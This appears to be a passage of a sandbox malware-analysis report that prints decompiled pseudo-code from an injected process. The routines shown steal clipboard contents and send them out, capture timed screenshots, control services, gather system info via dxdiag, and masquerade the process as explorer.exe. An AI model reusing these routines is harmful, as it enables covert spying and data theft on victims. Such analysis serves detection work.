                    • API String ID: 0-1267037602
                    • Opcode ID: f017f730da5f423951df016acc56fe018b36abbe325d1b6e8ffc0416dff523dd
                    • Instruction ID: dec2bdb26369982db7c5889bd327832f44181b2331e29388f4f60b1078a915a5
                    • Opcode Fuzzy Hash: f017f730da5f423951df016acc56fe018b36abbe325d1b6e8ffc0416dff523dd
                    • Instruction Fuzzy Hash: A551E235649301ABE7209E26D904BA77BE4ABC8711F08082FFA4593390D67DCDC18A5F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0043913A(void* __edx, void* __eflags, char* _a4, int _a8, char* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                    				int _v8;
                    				int _v12;
                    				char _v16;
                    				intOrPtr _v24;
                    				char _v28;
                    				void* __ebx;
                    				char* _t31;
                    				int _t35;
                    				int _t43;
                    				void* _t51;
                    				int _t52;
                    				int _t54;
                    				void* _t56;
                    				void* _t63;
                    				short* _t64;
                    				short* _t67;
                    
                    				_t62 = __edx;
                    				E004390B7(_t51,  &_v28, __edx, _a24);
                    				_t52 = 0;
                    				_t54 =  *(_v24 + 0x14);
                    				_t31 = _a4;
                    				_v8 = _t54;
                    				if(_t31 == 0) {
                    					L4:
                    					 *((intOrPtr*)(E0043EEAD())) = 0x16;
                    					E0043A5BB();
                    					L18:
                    					if(_v16 != 0) {
                    						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                    					}
                    					return _t52;
                    				}
                    				_t66 = _a8;
                    				if(_a8 == 0) {
                    					goto L4;
                    				}
                    				 *_t31 = 0;
                    				if(_a12 == 0 || _a16 == 0) {
                    					goto L4;
                    				} else {
                    					_t35 = MultiByteToWideChar(_t54, 0, _a12, 0xffffffff, 0, 0);
                    					_v12 = _t35;
                    					if(_t35 != 0) {
                    						_t64 = E00444A38(_t54, _t35 + _t35);
                    						_t56 = _t63;
                    						if(_t64 != 0) {
                    							if(MultiByteToWideChar(_v8, 0, _a12, 0xffffffff, _t64, _v12) != 0) {
                    								_t67 = E00444A38(_t56, _t66 + _t66);
                    								if(_t67 != 0) {
                    									_t43 = E00446260(0, _t62, _t67, _a8, _t64, _a16, _a20, _a24);
                    									_v12 = _t43;
                    									if(_t43 != 0) {
                    										if(WideCharToMultiByte(_v8, 0, _t67, 0xffffffff, _a4, _a8, 0, 0) != 0) {
                    											_t52 = _v12;
                    										} else {
                    											E0043EE77(GetLastError());
                    										}
                    									}
                    								}
                    								E00445002(_t67);
                    							} else {
                    								E0043EE77(GetLastError());
                    							}
                    						}
                    						E00445002(_t64);
                    					} else {
                    						E0043EE77(GetLastError());
                    					}
                    					goto L18;
                    				}
                    			}




















                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439192
                    • GetLastError.KERNEL32(?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043919F
                    • __dosmaperr.LIBCMT ref: 004391A6
                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004391D2
                    • GetLastError.KERNEL32(?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004391DC
                    • __dosmaperr.LIBCMT ref: 004391E3
                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D35,?), ref: 00439226
                    • GetLastError.KERNEL32(?,?,?,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439230
                    • __dosmaperr.LIBCMT ref: 00439237
                    • _free.LIBCMT ref: 00439243
                    • _free.LIBCMT ref: 0043924A
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                    • String ID:
                    • API String ID: 2441525078-0
                    • Opcode ID: 36c92f70edf6872b9f14a0353817578da13524950d77874f46d04974b582e123
                    • Instruction ID: 02b817c51ddb1bfcd431cbf40756152772ff8ffa7747545afeb7dfc7970056dd
                    • Opcode Fuzzy Hash: 36c92f70edf6872b9f14a0353817578da13524950d77874f46d04974b582e123
                    • Instruction Fuzzy Hash: 5A31D37140460BBFEF116FA5DC45CAF3B68EF09325F1002AAF810662A1DB78CD10DBA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E00405480(char* __edx, void* __eflags, intOrPtr _a4) {
                    				struct tagMSG _v52;
                    				void* _v56;
                    				char _v60;
                    				char _v76;
                    				char _v80;
                    				char _v84;
                    				char _v104;
                    				char _v108;
                    				void* _v112;
                    				char _v116;
                    				char _v120;
                    				char _v140;
                    				void* _v176;
                    				void* __ebx;
                    				void* __ebp;
                    				intOrPtr* _t28;
                    				char* _t36;
                    				intOrPtr _t45;
                    				intOrPtr _t46;
                    				void* _t57;
                    				intOrPtr _t69;
                    				void* _t111;
                    				void* _t113;
                    				void* _t115;
                    				void* _t117;
                    				signed int _t118;
                    				void* _t121;
                    				void* _t122;
                    				void* _t123;
                    				void* _t124;
                    
                    				_t126 = __eflags;
                    				_t101 = __edx;
                    				_t69 = _a4;
                    				E004020D6(_t69,  &_v104, __edx, __eflags, _t69 + 0xc);
                    				SetEvent( *(_t69 + 0x24));
                    				_t28 = E00401F8B( &_v108);
                    				E00404182( &_v108,  &_v60, 4, 0xffffffff);
                    				_t121 = (_t118 & 0xfffffff8) - 0x5c;
                    				E004020D6(_t69, _t121, _t101, _t126, 0x472ec8);
                    				_t122 = _t121 - 0x18;
                    				E004020D6(_t69, _t122, _t101, _t126,  &_v76);
                    				E0041A976( &_v140, _t101);
                    				_t123 = _t122 + 0x30;
                    				_t111 =  *_t28 - 0x3a;
                    				if(_t111 == 0) {
                    					E00401E45( &_v116, _t101, _t117, __eflags, 0);
                    					_t36 = E0040245C();
                    					E00401F8B(E00401E45( &_v120, _t101, _t117, __eflags, 0));
                    					_t101 = _t36;
                    					_t113 = E00411235();
                    					__eflags = _t113;
                    					if(_t113 == 0) {
                    						L7:
                    						E00401E6D( &_v116, _t101);
                    						E00401FB8();
                    						E00401FB8();
                    						__eflags = 0;
                    						return 0;
                    					}
                    					 *0x470af0 = E004114AA(_t113, "DisplayMessage");
                    					_t45 = E004114AA(_t113, "GetMessage");
                    					_t104 = "CloseChat";
                    					 *0x470ae8 = _t45;
                    					_t46 = E004114AA(_t113, "CloseChat");
                    					_t124 = _t123 - 0x18;
                    					 *0x470aec = _t46;
                    					 *0x470ae5 = 1;
                    					E004020D6(_t69, _t124, "CloseChat", __eflags, 0x472f60);
                    					_push(0x74);
                    					E00404A81(_t69, _t104, __eflags);
                    					L10:
                    					_t115 = HeapCreate(0, 0, 0);
                    					__eflags =  *0x470ae8(_t115,  &_v140);
                    					if(__eflags != 0) {
                    						_t124 = _t124 - 0x18;
                    						E00402097(_t69, _t124, _t104, _t117, __eflags, _v140, _t51);
                    						_push(0x3b);
                    						E00404A81(_t69, _t104, __eflags);
                    						HeapFree(_t115, 0, _v176);
                    					}
                    					goto L10;
                    				}
                    				_t128 = _t111 != 1;
                    				if(_t111 != 1) {
                    					goto L7;
                    				}
                    				_t57 =  *0x470af0(E00401F8B(E00401E45( &_v116, _t101, _t117, _t128, 0)));
                    				_t129 = _t57;
                    				if(_t57 == 0) {
                    					goto L7;
                    				}
                    				E0040415E(_t69,  &_v80, _t101, _t117, 0x464070);
                    				_t101 =  &_v84;
                    				E0041A879(_t69, _t123 - 0x18,  &_v84);
                    				_push(0x3b);
                    				E00404A81(_t69,  &_v84, _t129);
                    				E00401EE9();
                    				L4:
                    				while(GetMessageA( &_v52, 0, 0, 0) > 0) {
                    					TranslateMessage( &_v52);
                    					DispatchMessageA( &_v52);
                    				}
                    				if(__eflags < 0) {
                    					goto L4;
                    				}
                    				goto L7;
                    			}


































                    APIs
                    • SetEvent.KERNEL32(?,?), ref: 0040549F
                    • GetMessageA.USER32 ref: 0040554F
                    • TranslateMessage.USER32(?), ref: 0040555E
                    • DispatchMessageA.USER32 ref: 00405569
                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00472F60), ref: 00405621
                    • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659
                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                    • String ID: CloseChat$DisplayMessage$GetMessage
                    • API String ID: 2956720200-749203953
                    • Opcode ID: 2d00f7b2c1d5805ea62b1aa5cd655ac0b20f9e4c3bb4ed9f541ff053e451993d
                    • Instruction ID: ded252b4ff533e87208d36ac19c2d613ad87dfbb1ef060abaf95112ea2b93138
                    • Opcode Fuzzy Hash: 2d00f7b2c1d5805ea62b1aa5cd655ac0b20f9e4c3bb4ed9f541ff053e451993d
                    • Instruction Fuzzy Hash: 7B419271A043016BCA04FB75DC5A86F77A9EBC5714F40093EFA06A31E5DF398905CB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 15%
                    			E00406A20(void* __edx, void* __esi, void* __ebp) {
                    				char _v4;
                    				signed int _v20;
                    				void* __ebx;
                    				void* __ecx;
                    				signed int _t19;
                    				void* _t40;
                    				void* _t48;
                    				intOrPtr _t49;
                    				void* _t52;
                    				void* _t53;
                    				void* _t54;
                    				void* _t56;
                    				char* _t57;
                    				void* _t59;
                    				signed int _t65;
                    
                    				_t56 = __ebp;
                    				_t53 = __esi;
                    				_t52 = _t48;
                    				if(_t52 != 0) {
                    					L3:
                    					 *0x470b04(_t53, _t56);
                    					_t54 = E004068CB();
                    					if(_t52 == 0) {
                    						_t49 =  *((intOrPtr*)(_t54 + 0x10));
                    						_t57 = L"explorer.exe";
                    						 *0x473968 =  *(_t49 + 0x3c);
                    						 *0x47396c =  *(_t49 + 0x44);
                    						_t19 =  *0x470b14; // 0x0
                    					} else {
                    						_t57 =  *0x47396c;
                    						_t19 =  *0x473968;
                    					}
                    					 *0x470afc( *((intOrPtr*)(_t54 + 0x10)) + 0x38, _t19);
                    					 *0x470afc( *((intOrPtr*)(_t54 + 0x10)) + 0x40, _t57);
                    					if(_t52 != 0) {
                    						_v20 = _v20 & 0x00000000;
                    						 *0x470b0c(GetCurrentProcess(), 0x470b14,  &_v20, 0x8000);
                    						 *0x470b14 =  *0x470b14 & 0x00000000;
                    						_t65 =  *0x470b14;
                    					}
                    					E00406874(_t65, "PEB: %x\n", _t54);
                    					E0040683F(_t65);
                    					E00406874(_t65, "\n",  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x10)) + 0x3c)));
                    					E0040683F(_t65);
                    					E00406874(_t65, "\n",  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x10)) + 0x44)));
                    					 *0x470b10();
                    					return  *0x470af8(0, E0040697D, _t52);
                    				}
                    				 *0x470b14 =  *0x470b14 & 0x00000000;
                    				_t1 =  &_v4; // 0x473220
                    				_v4 = 0x1000;
                    				_t40 =  *0x470b00(GetCurrentProcess(), 0x470b14, 0, _t1, 0x3000, 4);
                    				_t62 = _t40;
                    				if(_t40 < 0) {
                    					_push("[-] NtAllocateVirtualMemory Error\n");
                    					return E00406874(__eflags);
                    				}
                    				E0043E0D9( *0x470b14, E0043A99F(GetCurrentProcess, _t48, _t62, L"windir"));
                    				E0043E0FB( *0x470b14, L"\\explorer.exe");
                    				_push("[+] NtAllocateVirtualMemory Success\n");
                    				E00406874(_t62);
                    				_t59 = _t59 + 0x18;
                    				goto L3;
                    			}



















                    APIs
                    • GetCurrentProcess.KERNEL32(00470B14,00000000, 2GBm@,00003000,00000004,00000000,00000001), ref: 00406A51
                    • GetCurrentProcess.KERNEL32(00470B14,00000000,00008000,?,00000000,00000001,00000000,00406CCA,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe), ref: 00406B12
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentProcess
                    • String ID: 2GBm@$PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                    • API String ID: 2050909247-2552087879
                    • Opcode ID: 2dbb473b084c92d41a398965754a8d860a590b788ad9187afee9f3367e6bbd1b
                    • Instruction ID: acb57f4be5314c8fdc403cfcc3c6874ba858f2dc6f38655895ae1e2efeca9399
                    • Opcode Fuzzy Hash: 2dbb473b084c92d41a398965754a8d860a590b788ad9187afee9f3367e6bbd1b
                    • Instruction Fuzzy Hash: EC31D8B2642300EBC710FFA5DC45F1677B8AB45349F11443AF506A6191DBB8E954CB2D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 80%
                    			E00415881(void* __ebp, void* _a8, char _a16, char _a24, char _a28, void* _a152, void* _a176) {
                    				void* __ebx;
                    				void* _t16;
                    				struct HWND__* _t23;
                    				void* _t38;
                    				void* _t41;
                    
                    				if(OpenClipboard(_t23) != 0) {
                    					EmptyClipboard();
                    					CloseClipboard();
                    					if(OpenClipboard(_t23) != 0) {
                    						_t38 = GetClipboardData(0xd);
                    						_t16 = GlobalLock(_t38);
                    						GlobalUnlock(_t38);
                    						CloseClipboard();
                    						_t29 =  !=  ? _t16 : 0x46a8f0;
                    						E0040415E(_t23,  &_a28, _t34, __ebp,  !=  ? _t16 : 0x46a8f0);
                    						_t34 =  &_a24;
                    						E0041A879(_t23, _t41 - 0x18,  &_a24);
                    						_push(0x6b);
                    						E00404A81(0x4734e8,  &_a24, _t16);
                    						E00401EE9();
                    					}
                    				}
                    				E00401E6D( &_a16, _t34);
                    				E00401FB8();
                    				E00401FB8();
                    				return 0;
                    			}









                    APIs
                    • OpenClipboard.USER32 ref: 00415882
                    • EmptyClipboard.USER32 ref: 00415890
                    • CloseClipboard.USER32 ref: 00415896
                    • OpenClipboard.USER32 ref: 0041589D
                    • GetClipboardData.USER32 ref: 004158AD
                    • GlobalLock.KERNEL32 ref: 004158B6
                    • GlobalUnlock.KERNEL32(00000000), ref: 004158BF
                    • CloseClipboard.USER32 ref: 004158C5
                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                    • String ID: 4G
                    • API String ID: 2172192267-3080958808
                    • Opcode ID: f3e59b1ac7b06c90a28648a2ca30acba09b622406cd352ec576d636826a3b127
                    • Instruction ID: 4d86aa06e49f03239fcc2a4fb0273d51e2f014b5d08f715770ad07ab5d505bde
                    • Opcode Fuzzy Hash: f3e59b1ac7b06c90a28648a2ca30acba09b622406cd352ec576d636826a3b127
                    • Instruction Fuzzy Hash: 9D0121312083009BC314BF75EC596AE77A5BF90352F40493EFD06922A3DF38C946DA9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E00419668(char _a4) {
                    				intOrPtr _v28;
                    				struct _SERVICE_STATUS _v32;
                    				int _t22;
                    				void* _t26;
                    				void* _t27;
                    
                    				_t22 = 0;
                    				_t27 = OpenSCManagerW(0, 0, 0x11);
                    				_t26 = OpenServiceW(_t27, E00401EE4( &_a4), 0xf003f);
                    				if(_t26 != 0) {
                    					if(ControlService(_t26, 1,  &_v32) != 0) {
                    						do {
                    							QueryServiceStatus(_t26,  &_v32);
                    						} while (_v28 != 1);
                    						StartServiceW(_t26, 0, 0);
                    						asm("sbb ebx, ebx");
                    						_t22 = 3;
                    						CloseServiceHandle(_t27);
                    						CloseServiceHandle(_t26);
                    					} else {
                    						CloseServiceHandle(_t27);
                    						CloseServiceHandle(_t26);
                    						_t22 = 2;
                    					}
                    				} else {
                    					CloseServiceHandle(_t27);
                    				}
                    				E00401EE9();
                    				return _t22;
                    			}









                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,00418FE1,00000000), ref: 00419677
                    • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00418FE1,00000000), ref: 0041968E
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418FE1,00000000), ref: 0041969B
                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00418FE1,00000000), ref: 004196AA
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418FE1,00000000), ref: 004196BB
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418FE1,00000000), ref: 004196BE
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ControlManager
                    • String ID:
                    • API String ID: 221034970-0
                    • Opcode ID: d85d181540acee76805cb3e11bb03bc958355361dea357d92f0995f51621def8
                    • Instruction ID: 3276af7575f15d8841acc4b0191f81aff6206dc885fe3b462974ed1c719105d3
                    • Opcode Fuzzy Hash: d85d181540acee76805cb3e11bb03bc958355361dea357d92f0995f51621def8
                    • Instruction Fuzzy Hash: 0B11E5319042187FD710AF64ECC9CFF3BACDB52BA6B000036F915921D1DB688D469AF9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004469A1(char _a4) {
                    				char _v8;
                    
                    				_t26 = _a4;
                    				_t52 =  *_a4;
                    				if( *_a4 != 0x45b2e0) {
                    					E00445002(_t52);
                    					_t26 = _a4;
                    				}
                    				E00445002( *((intOrPtr*)(_t26 + 0x3c)));
                    				E00445002( *((intOrPtr*)(_a4 + 0x30)));
                    				E00445002( *((intOrPtr*)(_a4 + 0x34)));
                    				E00445002( *((intOrPtr*)(_a4 + 0x38)));
                    				E00445002( *((intOrPtr*)(_a4 + 0x28)));
                    				E00445002( *((intOrPtr*)(_a4 + 0x2c)));
                    				E00445002( *((intOrPtr*)(_a4 + 0x40)));
                    				E00445002( *((intOrPtr*)(_a4 + 0x44)));
                    				E00445002( *((intOrPtr*)(_a4 + 0x360)));
                    				_v8 =  &_a4;
                    				E00446867(5,  &_v8);
                    				_v8 =  &_a4;
                    				return E004468B7(4,  &_v8);
                    			}





                    APIs
                    • _free.LIBCMT ref: 004469B5
                      • Part of subcall function 00445002: RtlFreeHeap.NTDLL(00000000,00000000,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?), ref: 00445018
                      • Part of subcall function 00445002: GetLastError.KERNEL32(?,?,0044F4EF,?,00000000,?,00000000,?,0044F793,?,00000007,?,?,0044FCDE,?,?), ref: 0044502A
                    • _free.LIBCMT ref: 004469C1
                    • _free.LIBCMT ref: 004469CC
                    • _free.LIBCMT ref: 004469D7
                    • _free.LIBCMT ref: 004469E2
                    • _free.LIBCMT ref: 004469ED
                    • _free.LIBCMT ref: 004469F8
                    • _free.LIBCMT ref: 00446A03
                    • _free.LIBCMT ref: 00446A0E
                    • _free.LIBCMT ref: 00446A1C
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: a77394449d3610cf2611ec2a31762a356df4dfaed9a22a67b89f0f03ee6ab5ce
                    • Instruction ID: 446d01ee53aad5418ccd4e85611433309046038f6e50f54d807d40262714f670
                    • Opcode Fuzzy Hash: a77394449d3610cf2611ec2a31762a356df4dfaed9a22a67b89f0f03ee6ab5ce
                    • Instruction Fuzzy Hash: F511B9B9100509BFEF01EF56D842CDD3B69FF04758B1140AAF9488F222D676DE509B85
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E00418B0F() {
                    				intOrPtr* _t42;
                    				void* _t45;
                    				char* _t54;
                    				void* _t72;
                    				long _t78;
                    				void* _t83;
                    				struct _SECURITY_ATTRIBUTES* _t85;
                    				struct _SECURITY_ATTRIBUTES* _t92;
                    				void* _t131;
                    				void* _t132;
                    				void* _t140;
                    				void* _t141;
                    				void* _t146;
                    				intOrPtr _t147;
                    				void* _t148;
                    				void* _t149;
                    
                    				E00456328(E00456753, _t146);
                    				_push(_t141);
                    				 *((intOrPtr*)(_t146 - 0x10)) = _t147;
                    				_t92 = 0;
                    				 *((intOrPtr*)(_t146 - 4)) = 0;
                    				_t149 =  *0x470da4 - _t92; // 0x0
                    				if(_t149 == 0) {
                    					_t147 = _t147 - 0xc;
                    					_t131 = _t146 - 0x68;
                    					E004174ED(_t131);
                    					__imp__GdiplusStartup(0x470da4, _t131, 0);
                    				}
                    				_t150 =  *0x4726a8 - _t92;
                    				if( *0x4726a8 == _t92) {
                    					E00401EF3(0x473600, _t132, _t141, E00418023(_t146 - 0x40, _t132));
                    					E00401EE9();
                    				}
                    				_t42 = E00401F8B(E00401E45(0x473298, _t132, _t146, _t150, 0x19));
                    				_t45 = E00401EE4(E0041A7B9(_t146 - 0x58, E00401E45(0x473298, _t132, _t146, _t150, 0x1a)));
                    				_t134 =  *_t42;
                    				E00401EF3(0x473618,  *_t42, 0x473618, E0040CF38(_t146 - 0x40,  *_t42, _t45));
                    				E00401EE9();
                    				E00401EE9();
                    				CreateDirectoryW(E00401EE4(0x473618), _t92);
                    				E00401F66(_t92, _t146 - 0xb0);
                    				E00401F66(_t92, _t146 - 0x80);
                    				 *(_t146 - 0x11) = _t92;
                    				 *0x470d63 = 1;
                    				_t54 =  *((intOrPtr*)(_t146 + 8));
                    				_t145 =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
                    				 *(_t146 - 0x18) =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
                    				_t140 = Sleep;
                    				L6:
                    				while(1) {
                    					if( *_t54 != 1) {
                    						L11:
                    						GetLocalTime(_t146 - 0x28);
                    						_push( *(_t146 - 0x1c) & 0x0000ffff);
                    						_push( *(_t146 - 0x1e) & 0x0000ffff);
                    						_push( *(_t146 - 0x20) & 0x0000ffff);
                    						_push( *(_t146 - 0x22) & 0x0000ffff);
                    						_push( *(_t146 - 0x26) & 0x0000ffff);
                    						E004174C7(_t146 - 0x2b8, _t145,  *(_t146 - 0x28) & 0x0000ffff);
                    						_t147 = _t147 + 0x20;
                    						E00401EF3(_t146 - 0x80, _t66, _t145, E00402FF4(_t92, _t146 - 0x58, E00402FF4(_t92, _t146 - 0x40, E004087F0(_t146 - 0x98, 0x473618, _t146, "\\"), _t140, _t146, __eflags, _t146 - 0x2b8), _t140, _t146, __eflags, 0x4644f0));
                    						E00401EE9();
                    						E00401EE9();
                    						E00401EE9();
                    						_t72 = E00401EE4(_t146 - 0x80);
                    						_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1));
                    						E004189C9(_t72,  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1)), __eflags);
                    						__eflags =  *((char*)( *((intOrPtr*)(_t146 + 8))));
                    						if(__eflags != 0) {
                    							_t92 = 0;
                    							 *(_t146 - 0x11) = 0;
                    							_t78 = E0043A3AC(_t75, E00401F8B(E00401E45(0x473298, _t134, _t146, __eflags, 0x18))) * 0x3e8;
                    							__eflags = _t78;
                    						} else {
                    							_t78 = E0043A3AC(_t79, E00401F8B(E00401E45(0x473298, _t134, _t146, __eflags, 0x15))) * 0xea60;
                    						}
                    						Sleep(_t78);
                    						_t54 =  *((intOrPtr*)(_t146 + 8));
                    						continue;
                    					}
                    					_t145 = L"wnd_%04i%02i%02i_%02i%02i%02i";
                    					 *(_t146 - 0x18) = L"wnd_%04i%02i%02i_%02i%02i%02i";
                    					while(1) {
                    						_t153 = _t92;
                    						if(_t92 != 0) {
                    							goto L11;
                    						}
                    						_t83 = E00401F8B(E00401E45(0x473298, _t134, _t146, _t153, 0x17));
                    						_t148 = _t147 - 0x18;
                    						E0040415E(_t92, _t148, _t134, _t146, _t83);
                    						_t85 = E0041AECA(0, _t134);
                    						_t147 = _t148 + 0x18;
                    						_t92 = _t85;
                    						 *(_t146 - 0x11) = _t92;
                    						if(_t92 != 0) {
                    							goto L11;
                    						}
                    						Sleep(0x3e8);
                    					}
                    					goto L11;
                    				}
                    			}




















                    APIs
                    • __EH_prolog.LIBCMT ref: 00418B14
                    • GdiplusStartup.GDIPLUS(00470DA4,?,00000000), ref: 00418B46
                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 00418BD2
                    • Sleep.KERNEL32(000003E8), ref: 00418C58
                    • GetLocalTime.KERNEL32(?), ref: 00418C60
                    • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00418D4F
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                    • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                    • API String ID: 489098229-3790400642
                    • Opcode ID: fbb170c64f31fa6bc270d605897b85c664e1c532982a9b3bb3c110d9e37f8fa9
                    • Instruction ID: 3ed6f2237b04738f373db28fc4f4b477a217fcc6b97d40d34bd9c141d7353832
                    • Opcode Fuzzy Hash: fbb170c64f31fa6bc270d605897b85c664e1c532982a9b3bb3c110d9e37f8fa9
                    • Instruction Fuzzy Hash: 62515E70A002149BCB14BBA5D8969FE7BA9AF54308F00007FF905A72D2EE3C5E859799
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004558FF), ref: 00454828
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: DecodePointer
                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                    • API String ID: 3527080286-3064271455
                    • Opcode ID: 0e018571e0e3bee39f27182ae3374471161ca0f080fa7e6920fbb972b2695178
                    • Instruction ID: 1e4b404f929ba93ddebd2aa3e63fb042eaa484edc2c2b789af0694e21190d044
                    • Opcode Fuzzy Hash: 0e018571e0e3bee39f27182ae3374471161ca0f080fa7e6920fbb972b2695178
                    • Instruction Fuzzy Hash: F2519474900509DBCB04DF69E5481AEBBB4FB8930AF504197DC44AF256C7398EADCB1D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E00416495(void* __ecx, void* __edx, void* __edi, void* __eflags, char _a4) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				char _v204;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t46;
                    				void* _t54;
                    				void* _t55;
                    				void* _t90;
                    				void* _t92;
                    				void* _t93;
                    
                    				_t95 = __eflags;
                    				_t90 = __edi;
                    				E00402FF4(_t54,  &_v76, E0040415E(_t54,  &_v52, __edx, _t92, E0043A99F(_t54, __ecx, __eflags, L"temp")), _t90, _t92, _t95, L"\\sysinfo.txt");
                    				E00401EE9();
                    				_t55 = 0;
                    				ShellExecuteW(0, L"open", L"dxdiag", E00401EE4(E0040AEF6( &_v52, L"/t ", _t92,  &_v76)), 0, 0);
                    				E00401EE9();
                    				E004020BF(0,  &_v28);
                    				_t91 = 0;
                    				do {
                    					E00401EE4( &_v76);
                    					_t88 =  &_v28;
                    					E0041ADFE( &_v28);
                    					Sleep(0x64);
                    					_t91 = _t91 + 1;
                    				} while (E0040619C() != 0 && _t91 < 0x4b0);
                    				if(E0040619C() == 0) {
                    					DeleteFileW(E00401EE4( &_v76));
                    					_t75 =  &_v204;
                    					E004046D7( &_v204, _t92, 1);
                    					_t46 = E004048A8( &_v204, _t91, _t75);
                    					_t100 = _t46;
                    					if(_t46 != 0) {
                    						_t91 = _t93 - 0x18;
                    						_t88 = E00402F11( &_v52,  &_a4, _t92, 0x472ec8);
